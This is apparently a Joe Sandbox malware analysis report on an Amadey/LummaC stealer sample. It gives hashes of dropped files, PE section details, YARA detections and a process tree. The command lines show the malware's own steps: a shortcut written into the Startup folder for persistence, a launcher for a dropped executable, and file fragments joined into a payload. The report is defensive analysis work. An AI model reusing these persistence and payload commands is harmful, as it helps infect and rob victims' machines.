MD5:	490B5290B6045EED5B38D439EBB30C88
SHA1:	88A3E42C96296B532546EFF9364CAEDDD7FF2038
SHA-256:	05C63F408E77AF41D69ED890A66D118992DEEFDFB95771FC4285D3567BCE843C
SHA-512:	1B4018D696F89805262113A3423695BFC77D2E35AD353255EDE4A3949374C6BCEE783D9DC7CCB001489FDB7938C7977E0316C8423D4C58D32D0F776B16C2D36C
Malicious:	false
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.6.4.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.7.3.7.0.7.0.5.0.4.6.5.7.0.3.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.7.3.7.0.7.0.5.3.9.0.2.2.7.0.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.a.0.c.6.9.9.7.e.-.a.d.6.5.-.4.8.7.8.-.9.3.d.b.-.7.3.a.7.3.8.a.0.7.7.1.b.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.0.d.a.2.0.e.c.f.-.3.5.e.d.-.4.0.1.f.-.b.1.7.9.-.3.d.1.0.a.7.d.8.d.a.1.2.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....N.s.A.p.p.N.a.m.e.=.9.2.6.0.8.5.a.3.b.a...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.6.3.c.-.0.0.0.1.-.0.0.5.0.-.d.1.d.7.-.3.a.4.f.7.a.4.2.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.f.7.0.2.4.4.2.8.d.9.7.9.5.6.1.a.c.9.d.7.6.3.5.c.4.5.a.1.5.0.7.a.0.0.0.0.f.f.f.f.!.0.0.0.0.8.5.7.f.b.4.8.5.2.f.3.1.4.2.8.e.a.d.5.e.2.d.9.f.b.d.5.b.f.b.1.6.d.9.7.1.4.d.1.a.!.9.2.6.0.8.5.a.3.b.a...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.4././.1.1././.1.9.:.1.8.

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	79876
Entropy (8bit):	3.063659662181772
Encrypted:	false
SSDEEP:	1536:C3yvOlm+5RVUtXjPWYWltNFMymZydPydLyS67dle4RykDoynxy/e4BUyxxyU3UyF:C3yvOlm+5RVUtXjPWYW3NFMymZydPydF
MD5:	B4DF66F88157AD60B623DA72467510BA
SHA1:	53DB9234B78A9CF7D8BF64A679316D5C900544A4
SHA-256:	F3FC09A1DD2D5BD3A575152208FD9C46C8071B734C76A64EA0069DC77CA9BBD0
SHA-512:	52A97900332BEC44A1F9FC0A6B2D89C5C2B6CC44B3D15EC020B1C5BC2A9842445A589B13A59EABAD0A743839C926F4AA22D42258D7D83543E663CA1415A49E48
Malicious:	false
Preview:	I.m.a.g.e.N.a.m.e.,.U.n.i.q.u.e.P.r.o.c.e.s.s.I.d.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.,.W.o.r.k.i.n.g.S.e.t.P.r.i.v.a.t.e.S.i.z.e.,.H.a.r.d.F.a.u.l.t.C.o.u.n.t.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.H.i.g.h.W.a.t.e.r.m.a.r.k.,.C.y.c.l.e.T.i.m.e.,.C.r.e.a.t.e.T.i.m.e.,.U.s.e.r.T.i.m.e.,.K.e.r.n.e.l.T.i.m.e.,.B.a.s.e.P.r.i.o.r.i.t.y.,.P.e.a.k.V.i.r.t.u.a.l.S.i.z.e.,.V.i.r.t.u.a.l.S.i.z.e.,.P.a.g.e.F.a.u.l.t.C.o.u.n.t.,.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.P.e.a.k.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.Q.u.o.t.a.P.e.a.k.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.e.a.k.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.e.a.k.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.r.i.v.a.t.e.P.a.g.e.C.o.u.n.t.,.R.e.a.d.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.W.r.i.t.e.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.O.t.h.e.r.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.R.e.a.d.T.r.a.n.s.f.e.r.C.o.u.n.t.,.W.r.i.t.e.T.r.a.n.s.f.e.r.C.o.u.n.t.,.O.t.h.e.r.T.r.a.n.s.f.e.r.C.o.u.n.t.,.H.a.n.

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe
File Type:	CSV text
Category:	modified
Size (bytes):	660
Entropy (8bit):	5.390373388921441
Encrypted:	false
SSDEEP:	12:Q3La/KDLI4MWuPyEs51KDLI4MN5td3Qq1BakvoDLI4MWuPakhkk7v:ML9E4Ka11qE4Gv3Qq0E4KZN
MD5:	8034A02CCFD6B12E0C18707D72A7E3E4
SHA1:	3C2C3514E19301D93F57A972BFC26AA2C51FE68B
SHA-256:	48C4F7D8DA5CD9C184D519848ED0ED1C9B90152A0E5DC4C44B772B74E73D008F
SHA-512:	1DE4D77DA9E325E05B6D429094E2797884D13B577495F2B9E0EBCF056DE8A768CC62C5BE6CDE538F1728FF318BA4B8060BC0A7E98A89D31ED9CA591049618CC1
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\d1b08a492d712e019f310913d82efb4d\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\4dac268a38ead99f93898a086bb8c6f6\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\a3a3552abaec178f75d88f04f940cde4\System.Windows.Forms.ni.dll",0..

Process:	C:\Windows\SysWOW64\cmd.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1065128
Entropy (8bit):	6.43820773264071
Encrypted:	false
SSDEEP:	24576:SAwciuvaj8l4LEWumcKYB5Wek2vY+BYssmNolbmmPmJ4Ve+aaWBS:SALTBaLETmcKYB5WH2AwjsLbmmPmJ4Vt
MD5:	C63860691927D62432750013B5A20F5F
SHA1:	03678170AADF6BAB2AC2B742F5EA2FD1B11FECA3
SHA-256:	69D2F1718EA284829DDF8C1A0B39742AE59F2F21F152A664BAA01940EF43E353
SHA-512:	3357CB6468C15A10D5E3F1912349D7AF180F7BD4C83D7B0FD1A719A0422E90D52BE34D9583C99ABECCDB5337595B292A2AA025727895565F3A6432CAB46148DE
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$........1.q.P.".P.".P."y..".P."y.."QP."y..".P."S.1".P.".8.#.P.".8.#.P.".8.#.P.".(u".P.".(q".P.".(e".P.".P.".R."^9.#.P."^9.#.P."^9.".P.".Pa".P."^9.#.P."Rich.P."........PE..d......^.........."......:...(.......R.........@.........................................`...@...............@..............................[..\|.......h....@..To...$..........t....p......................X...(...0p...............P..8............................text....9.......:.................. ..`.rdata...A...P...B...>..............@..@.data...P........P..................@....pdata..To...@...p..................@..@.rsrc...h............@..............@..@.reloc..t...........................@..B................................................................................................................................................................................................................

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1870336
Entropy (8bit):	7.950830801509784
Encrypted:	false
SSDEEP:	24576:9w/gXXZLf9FpuSVA83ZIaoOD8BR98BpLOKKxsGaC3x5MY0s9r3k7in9tFvGH:9kKpVu8pIO+D8rLOKHRQ5MYR3mV
MD5:	3CA635061FA9685D799784F665850565
SHA1:	549BB2808560D826B7BE8EA502B46E3CDC101CE3
SHA-256:	373FFB138B7376264A307837EF5BD51BD02380376F9FDD27350CF1B65A28BCBB
SHA-512:	7812EDB799FC4AC60C856C61ECD793FB5499FFE433C9BF60E251D4E3E9D5BB4DF8D8F2873BB643036CCBB5BC611CC339AD8E8789FEEC3B3C5834BB72ED887792
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 55%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........-I..C...C...C...@...C...F.B.C.6.G...C.6.@...C.6.F...C...G...C...B...C...B.5.C.x.J...C.x.....C.x.A...C.Rich..C.........................PE..L....V.f.............................`J...........@...........................J...........@.................................W...k.......D....................MJ..............................MJ..................................................... . ............................@....rsrc...D...........................@....idata ............................@... .0*.........................@...muzjjppg.p....0..n..................@...wbgldlky.....PJ......d..............@....taggant.0...`J.."...h..............@...................................................................................................................................................................................................................

Process:	C:\Windows\System32\cmd.exe
File Type:	MS Windows 95 Internet shortcut text (URL=<"C:\Users\user\AppData\Local\CyberSphere Dynamics\ZeusChat.js" >), ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	94
Entropy (8bit):	4.841103880383337
Encrypted:	false
SSDEEP:	3:HRAbABGQaFyw3pYoONtkE2J5mcVIFzRLF:HRYF5yjoCN23mc6FzRLF
MD5:	272E63F9BA7A913B8BEDB49A2C161366
SHA1:	03348F4C93CA64E25897C7AAEA8CD893291CE940
SHA-256:	C6F33AF5A161F3301B103AFDB3097B34581BB2ADC7EC97DA0C8213FD306B0165
SHA-512:	974B275022EEDE8AC1606251EF056B2384C10C9F260485954D6F88151C1C42A4585C5C4DF5EADA31FECC96375A8DE7C5CB6F6DFF8807D50C55D3824581512140
Malicious:	true
Preview:	[InternetShortcut] ..URL="C:\Users\user\AppData\Local\CyberSphere Dynamics\ZeusChat.js" ..

Entrypoint:	0x8a6000
Entrypoint Section:	.taggant
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, TERMINAL_SERVER_AWARE
Time Stamp:	0x66F0569C [Sun Sep 22 17:40:44 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	6
OS Version Minor:	0
File Version Major:	6
File Version Minor:	0
Subsystem Version Major:	6
Subsystem Version Minor:	0
Import Hash:	2eabe9054cad5152567f0699947a2c5b

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x6a057	0x6b	.idata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x69000	0x344	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x4a4df0	0x10	muzjjppg
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x4a4da0	0x18	muzjjppg
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
	0x1000	0x68000	0x2de00	c60c371754fd4a35dab60ab65c045a1e	False	0.9979883344686649	data	7.9801769505302085	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x69000	0x344	0x400	982623c07c43a8169da5c3bd55ce4d06	False	0.4345703125	data	5.395849414192414	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata	0x6a000	0x1000	0x200	cc76e3822efdc911f469a3e3cc9ce9fe	False	0.1484375	data	1.0428145631430756	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
	0x6b000	0x2a3000	0x200	81758b72db536055a5ac3a16a6046a47	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
muzjjppg	0x30e000	0x197000	0x196e00	57ac07bf99d74c0391a0aa08194541e1	False	0.9947742655529954	data	7.955315833792344	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
wbgldlky	0x4a5000	0x1000	0x400	e9b85274fc305f890f272676de75d472	False	0.7607421875	data	6.0930191478869435	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.taggant	0x4a6000	0x3000	0x2200	66d32de920a4c7aec9113edf2054a36a	False	0.07261029411764706	DOS executable (COM)	0.8086771376046641	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_MANIFEST	0x69070	0x152	ASCII text, with CRLF line terminators			0.6479289940828402
RT_MANIFEST	0x691c4	0x17d	XML 1.0 document, ASCII text, with CRLF line terminators	English	United States	0.5931758530183727

Target ID:	1
Start time:	11:17:39
Start date:	29/11/2024
Path:	C:\Users\user\Desktop\file.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\file.exe"
Imagebase:	0xe90000
File size:	1'870'336 bytes
MD5 hash:	3CA635061FA9685D799784F665850565
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000001.00000002.13883161992.0000000000E91000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000001.00000003.13842539245.0000000005230000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Target ID:	2
Start time:	11:17:41
Start date:	29/11/2024
Path:	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"
Imagebase:	0xba0000
File size:	1'870'336 bytes
MD5 hash:	3CA635061FA9685D799784F665850565
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000002.00000003.13861306905.0000000004CB0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000002.00000002.13902305266.0000000000BA1000.00000040.00000001.01000000.00000007.sdmp, Author: Joe Security
Antivirus matches:	Detection: 55%, ReversingLabs
Reputation:	low
Has exited:	true

Target ID:	3
Start time:	11:17:42
Start date:	29/11/2024
Path:	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
Imagebase:	0xba0000
File size:	1'870'336 bytes
MD5 hash:	3CA635061FA9685D799784F665850565
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000003.00000003.13864024154.0000000005570000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000003.00000002.13904398630.0000000000BA1000.00000040.00000001.01000000.00000007.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Target ID:	5
Start time:	11:18:10
Start date:	29/11/2024
Path:	C:\Users\user\AppData\Local\Temp\1005824001\926085a3ba.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\AppData\Local\Temp\1005824001\926085a3ba.exe"
Imagebase:	0x7ff77fa00000
File size:	3'646'464 bytes
MD5 hash:	CA480193E4B8159DD1283118EBDE8896
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 68%, ReversingLabs
Reputation:	low
Has exited:	true

Target ID:	6
Start time:	11:18:13
Start date:	29/11/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c start cmd /C "ping localhost -n 1 && start C:\Users\user\AppData\Local\kreon.exe"
Imagebase:	0x7ff68c570000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Target ID:	12
Start time:	11:18:16
Start date:	29/11/2024
Path:	C:\Users\user\AppData\Local\Temp\1007319001\rodda.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\1007319001\rodda.exe"
Imagebase:	0xfc0000
File size:	1'852'416 bytes
MD5 hash:	79AC6D1413B763A6FA688B99E931BAFC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000C.00000003.14507012889.00000000064A8000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000C.00000003.14313728866.00000000064A8000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000C.00000003.14436725330.00000000064A8000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000C.00000003.14545599157.00000000064A8000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000C.00000003.14471313415.00000000064A8000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000C.00000003.14546004873.00000000064A8000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML
Has exited:	false

Target ID:	13
Start time:	11:18:22
Start date:	29/11/2024
Path:	C:\Users\user\AppData\Local\Temp\1005824001\926085a3ba.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\AppData\Local\Temp\1005824001\926085a3ba.exe"
Imagebase:	0x7ff77fa00000
File size:	3'646'464 bytes
MD5 hash:	CA480193E4B8159DD1283118EBDE8896
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Target ID:	15
Start time:	11:18:24
Start date:	29/11/2024
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k WerSvcGroup
Imagebase:	0x7ff79fed0000
File size:	57'360 bytes
MD5 hash:	F586835082F632DC8D9404D83BC16316
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Target ID:	18
Start time:	11:18:25
Start date:	29/11/2024
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
Imagebase:	0x7ff79fed0000
File size:	57'360 bytes
MD5 hash:	F586835082F632DC8D9404D83BC16316
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report file.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Amadey

Threatname: LummaC

Yara Signatures

Dropped Files

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Data Obfuscation

HIPS / PFW / Operating System Protection Evasion

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Phishing

Compliance

Spreading

Software Vulnerabilities

Networking

Spam, unwanted Advertisements and Ransom Demands

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

LLM Input / Output

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Program Files\TaskbarMonitor\Newtonsoft.Json.dll

C:\Program Files\TaskbarMonitor\TaskbarMonitor.dll

C:\Program Files\TaskbarMonitor\TaskbarMonitorInstaller.exe

C:\Program Files\TaskbarMonitor\TaskbarMonitorWindows11.exe

Windows Analysis Report
file.exe

Target ID:	20
Start time:	11:18:28
Start date:	29/11/2024
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-subproc-heap-profiling --field-trial-handle=2584,i,13543876262745876758,17897584690013245804,262144 --variations-seed-version=20240909-180142.416000 --mojo-platform-channel-handle=2688 /prefetch:3
Imagebase:	0x7ff6b9400000
File size:	2'742'376 bytes
MD5 hash:	BB7C48CDDDE076E7EB44022520F40F77
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Target ID:	21
Start time:	11:18:29
Start date:	29/11/2024
Path:	C:\Users\user\AppData\Local\Temp\1008835001\0fVlNye.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\1008835001\0fVlNye.exe"
Imagebase:	0x400000
File size:	4'389'991 bytes
MD5 hash:	978752B65601018DDD10636B648B8E65
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 47%, ReversingLabs
Has exited:	true

Target ID:	24
Start time:	11:18:31
Start date:	29/11/2024
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc
Imagebase:	0x7ff79fed0000
File size:	57'360 bytes
MD5 hash:	F586835082F632DC8D9404D83BC16316
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Target ID:	28
Start time:	11:18:32
Start date:	29/11/2024
Path:	C:\Windows\SysWOW64\tasklist.exe
Wow64 process (32bit):	true
Commandline:	tasklist
Imagebase:	0xd80000
File size:	79'360 bytes
MD5 hash:	0A4448B31CE7F83CB7691A2657F330F1
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Target ID:	30
Start time:	11:18:33
Start date:	29/11/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd /c md 29442
Imagebase:	0xbd0000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Target ID:	34
Start time:	11:18:35
Start date:	29/11/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	cmd /k echo [InternetShortcut] > "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ZeusChat.url" & echo URL="C:\Users\user\AppData\Local\CyberSphere Dynamics\ZeusChat.js" >> "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ZeusChat.url" & exit
Imagebase:	0x7ff68c570000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Target ID:	38
Start time:	11:18:36
Start date:	29/11/2024
Path:	C:\Users\user\AppData\Local\Temp\1009238001\vg9qcBa.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\AppData\Local\Temp\1009238001\vg9qcBa.exe"
Imagebase:	0x7d0000
File size:	1'008'128 bytes
MD5 hash:	1AD1C59E56BDBFA6705772D6991EEB02
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Target ID:	40
Start time:	11:18:38
Start date:	29/11/2024
Path:	C:\Users\user\AppData\Local\Temp\1005824001\926085a3ba.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\AppData\Local\Temp\1005824001\926085a3ba.exe"
Imagebase:	0x7ff77fa00000
File size:	3'646'464 bytes
MD5 hash:	CA480193E4B8159DD1283118EBDE8896
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Target ID:	46
Start time:	11:18:43
Start date:	29/11/2024
Path:	C:\Windows\SysWOW64\tasklist.exe
Wow64 process (32bit):	true
Commandline:	tasklist
Imagebase:	0xd80000
File size:	79'360 bytes
MD5 hash:	0A4448B31CE7F83CB7691A2657F330F1
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Target ID:	49
Start time:	11:18:44
Start date:	29/11/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd /c copy /b ..\Enhancements + ..\Images + ..\Mhz + ..\Founded + ..\Pk + ..\Reflected + ..\Downloadcom L
Imagebase:	0xbd0000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true